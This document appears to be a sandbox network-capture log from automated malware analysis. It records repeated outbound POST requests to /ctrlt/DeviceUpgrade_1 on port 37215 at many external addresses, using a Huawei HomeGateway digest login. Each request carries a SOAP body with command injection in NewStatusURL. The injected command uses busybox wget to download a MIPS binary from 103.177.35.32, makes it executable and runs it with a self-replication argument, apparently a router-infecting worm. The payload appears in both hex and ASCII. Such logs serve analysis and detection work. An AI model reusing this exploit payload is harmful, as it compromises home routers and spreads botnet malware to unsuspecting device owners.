                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2613192.168.2.235845841.199.144.13037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628511906 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2614192.168.2.235997041.238.31.23937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628521919 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2615192.168.2.2355600157.186.209.25237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628530025 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2616192.168.2.2348884157.196.85.11837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628545046 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2617192.168.2.2350668197.10.158.24637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628577948 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2618192.168.2.234287641.164.63.24137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628768921 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2619192.168.2.2360886157.228.31.2437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628773928 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2620192.168.2.235836241.66.19.18437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628787041 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2621192.168.2.2341262157.158.28.18937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628804922 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2622192.168.2.2334086197.69.207.6237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628854036 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
